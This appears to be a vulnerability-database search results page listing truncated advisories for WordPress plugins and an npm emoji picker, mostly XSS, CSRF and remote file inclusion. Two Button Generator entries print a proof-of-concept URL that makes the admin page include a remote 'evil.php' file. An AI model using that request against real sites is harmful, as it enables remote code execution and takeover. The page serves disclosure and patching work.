2672 matches found

OSV
added 2022/01/10 4:15 p.m., 1 view

CVE-2021-25052

The Button Generator WordPress plugin before 2.3.3 allows, within the wow-company admin menu page, the inclusion of arbitrary files with a PHP extension as well as via the data:// or http:// protocols, thus leading to CSRF-triggered RCE...

CVSS 8.8, AI score 7.4, EPSS 0.42408
Exploits 2, References 2
CVE
added 2022/01/10 3:30 p.m., 57 views

CVE-2021-25052

CVE-2021-25052 affects the WordPress Button Generator plugin (before 2.3.3) in the wow-company admin menu. A flaw in how include() handles PHP files (and data:// or http:// resources) enables remote file inclusion, which can lead to CSRF and remote code execution. Remediation: upgrade to version 2.3.3 ...

CVSS 8.8, AI score 8.8, EPSS 0.42408
Exploits 2, References 2, Affected Software 1
wpexploit
added 2022/01/10 12:00 a.m., 110 views

Cluevo < 1.8.1 - Admin+ Stored Cross Site Scripting

The plugin does not sanitise and escape the Course's module, which could allow high privilege users to perform Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed. On the Learning Management page /wp-admin/admin.php?page=cluevo-lms, click Add Course, then put the followi...

CVSS 4.8, EPSS 0.00206
Exploits 2
CNNVD
added 2022/01/10 12:00 a.m., 3 views

WordPress plugin Button Generator cross-site request forgery vulnerability

WordPress is the WordPress Foundation's set of blogging platforms developed using the PHP language. The WordPress Button Generator plugin has a file inclusion vulnerability in versions prior to 2.3.3. The vulnerability stems from the fact that the plugin does not effectively filter calls to remote file...

CVSS 8.8, AI score 6.2, EPSS 0.42408
Exploits 2, References 3
Code423n4
added 2022/01/04 12:00 a.m., 9 views

Dashboard is not working, lend positions are still loading, the same is true for the Lend button, and Lend Amount to lend is not refreshing

Handle: 0v3rf10w. Vulnerability details. Impact: Detailed description of the impact of this finding. Proof of Concept: Provide direct links to all referenced code in GitHub. Add screenshots, logs, or any other relevant proof that illustrates the concept. Tools Used. Recommended Mitigation Steps. --- The...

AI score 7.1
Exploits 0
Huntr
added 2022/01/02 12:30 p.m., 38 views

Code Injection in microweber/microweber

Description: HTML Injection is a vulnerability in which the attacker can inject malicious HTML content into the webpage. Proof of Concept: 1. Admin has enabled the Comments module, so that people can comment on a blog post. 2. Attacker posts the following comment: SOMETHING+SOMETHING Now, observe the change...

CVSS 5, AI score 1.4, EPSS 0.00675
Exploits 1
CNVD
added 2021/12/28 12:00 a.m., 16 views

WordPress Buttonizer - Smart Floating Action Button plugin cross-site scripting vulnerability

WordPress is a set of blogging platforms developed by the WordPress Foundation using the PHP language. The platform supports setting up personal blog sites on PHP and MySQL servers. The Buttonizer - Smart Floating Action Button plugin has a cross-site scripting vulnerability in versions prior to 2.5.5,...

CVSS 6.1, AI score 2, EPSS 0.0269
Exploits 4, References 1
CNVD
added 2021/12/15 12:00 a.m., 15 views

WordPress Plugin Information Disclosure Vulnerability (CNVD-2021-102800)

WordPress is the WordPress Foundation's set of blogging platforms developed using the PHP language. The platform supports PHP and MySQL servers to set up a personal blog site. WordPress Plugin is a WordPress open source application plugin. WordPress Plugins Like Button Rating LikeBtn An informati...

CVSS 8, AI score 7.5, EPSS 0.0025
Exploits 2, References 1
Prion
added 2021/12/13 11:15 a.m., 9 views

Cross site request forgery (CSRF)

The Like Button Rating ♥ LikeBtn WordPress plugin before 2.6.38 does not have any authorisation and CSRF checks in the likebtn_export_votes AJAX action, which could allow any authenticated user, such as a subscriber, to get a list of email and IP addresses of people who liked content from the blog...

CVSS 6, AI score 7.7, EPSS 0.0025
Exploits 2, References 1, Affected Software 1
Cvelist
added 2021/12/13 10:41 a.m., 13 views

CVE-2021-24945 Like Button Rating < 2.6.38 - Unauthorised Vote Export to Email & IP Addresses Disclosure

The Like Button Rating ♥ LikeBtn WordPress plugin before 2.6.38 does not have any authorisation and CSRF checks in the likebtn_export_votes AJAX action, which could allow any authenticated user, such as a subscriber, to get a list of email and IP addresses of people who liked content from the blog...

AI score 7.9, EPSS 0.0025
Exploits 2, References 1
CVE
added 2021/12/13 10:41 a.m., 42 views

CVE-2021-24945

The WordPress Like Button Rating LikeBtn plugin (versions before 2.6.38) has an authorization/CSRF weakness in the likebtn_export_votes AJAX action. This flaw allows any authenticated user (e.g., a subscriber) to retrieve a list of emails and IP addresses of users who liked content. Root cause: l...

CVSS 8, AI score 7.7, EPSS 0.0025
Exploits 2, References 1, Affected Software 1
CNNVD
added 2021/12/13 12:00 a.m., 2 views

WordPress Plugins Like Button Rating LikeBtn cross-site request forgery vulnerability

WordPress is the WordPress Foundation's set of blogging platforms developed using the PHP language. The platform supports PHP and MySQL servers to set up a personal blog site. WordPress Plugin is a WordPress open source application plugin. WordPress Plugins Like Button Rating LikeBtn An informati...

CVSS 8, AI score 5.7, EPSS 0.0025
Exploits 2, References 1
WPVulnDB
added 2021/12/05 12:00 a.m., 23 views

Button Generator < 2.3.3 - RFI leading to RCE via CSRF

The plugin, within the wow-company admin menu page, allows the inclusion of arbitrary files with a PHP extension as well as via the data:// or http:// protocols, thus leading to CSRF RCE. PoC: http://127.0.0.1:8001/wp-admin/admin.php?page=wow-company=https%3A%2F%2Fstatic.kazet.cc%2Fevil.php%3F PHP's...

CVSS 8.8, AI score 1.3, EPSS 0.42408
Exploits 2, References 1, Affected Software 1
wpexploit
added 2021/12/05 12:00 a.m., 66 views

Button Generator < 2.3.3 - RFI leading to RCE via CSRF

The plugin, within the wow-company admin menu page, allows the inclusion of arbitrary files with a PHP extension as well as via the data:// or http:// protocols, thus leading to CSRF RCE. http://127.0.0.1:8001/wp-admin/admin.php?page=wow-company&tab=https%3A%2F%2Fstatic.kazet.cc%2Fevil.php%3F PHP's...

CVSS 8.8, AI score 1.2, EPSS 0.42408
Exploits 2, References 1
Patchstack
added 2021/12/05 12:00 a.m., 18 views

WordPress Button Generator – easily Button Builder plugin <= 2.3.2 - Remote File Inclusion (RFI) leading to Remote Code Execution (RCE) via CSRF vulnerability

Remote File Inclusion (RFI) leading to Remote Code Execution (RCE) via CSRF vulnerability discovered by Krzysztof Zając in WordPress Button Generator – easily Button Builder plugin versions <= 2.3.2. Solution: Update the WordPress Button Generator – easily Button Builder plugin to the latest available...

CVSS 8.8, AI score 5, EPSS 0.42408
Exploits 2, References 3, Affected Software 1
vulnersOsv
added 2021/12/01 6:29 p.m., 0 views

react-chat-widget-all-dream (>=2.1.6 <=2.3.1) potentially affected by CVE-2021-43785 via @joeattardi/emoji-button (=2.12.1)

@joeattardi/emoji-button NPM version =2.12.1 is affected by a known vulnerability. The following packages have a transitive dependency on @joeattardi/emoji-button and may be impacted: - react-chat-widget-all-dream >=2.1.6, <=2.3.1 Source cves: CVE-2021-43785 Source advisory: OSV:GHSA-F34M-X9PJ-62VQ...

CVSS 7.6, AI score 6.7, EPSS 0.00398
Exploits 0
Veracode
added 2021/11/29 4:45 p.m., 16 views

Cross-site Scripting (XSS)

@joeattardi/emoji-button is vulnerable to cross-site scripting. The vulnerability exists because the custom emojis feature of emoji-button doesn't escape HTML, allowing an attacker to inject and execute malicious JavaScript...

CVSS 7.6, AI score 1.7, EPSS 0.00398
Exploits 0, References 3, Affected Software 1
OSV
added 2021/11/29 9:15 a.m., 1 view

CVE-2021-24883

The Popup Anything WordPress plugin before 2.0.4 does not escape the Link Text and Button Text fields of Popup, which could allow users with a role as low as Contributor to perform Cross-Site Scripting attacks...

CVSS 5.4, AI score 5.8
Exploits 0, References 3
WPVulnDB
added 2021/11/29 12:00 a.m., 11 views

Buttonizer - Smart Floating Action Button < 2.5.5 - Admin+ Stored Cross-Site Scripting

The plugin does not sanitise and escape some parameters before outputting them in attributes and the page, which could allow high privilege users to perform Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed. PoC: Add/edit a new button, set its Button action to "Website...

CVSS 4.8, AI score 4.7, EPSS 0.00206
Exploits 2, Affected Software 1
Cvelist
added 2021/11/26 6:20 p.m., 12 views

CVE-2021-43785 Cross Site Scripting Vulnerability in @joeattardi/emoji-button

@joeattardi/emoji-button is a Vanilla JavaScript emoji picker component. In affected versions there are two vectors for XSS attacks: a URL for a custom emoji, and an i18n string. In both of these cases, a value can be crafted such that it can insert a script tag into the page and execute maliciou...

CVSS 7.6, AI score 7.4, EPSS 0.00398
Exploits 0, References 3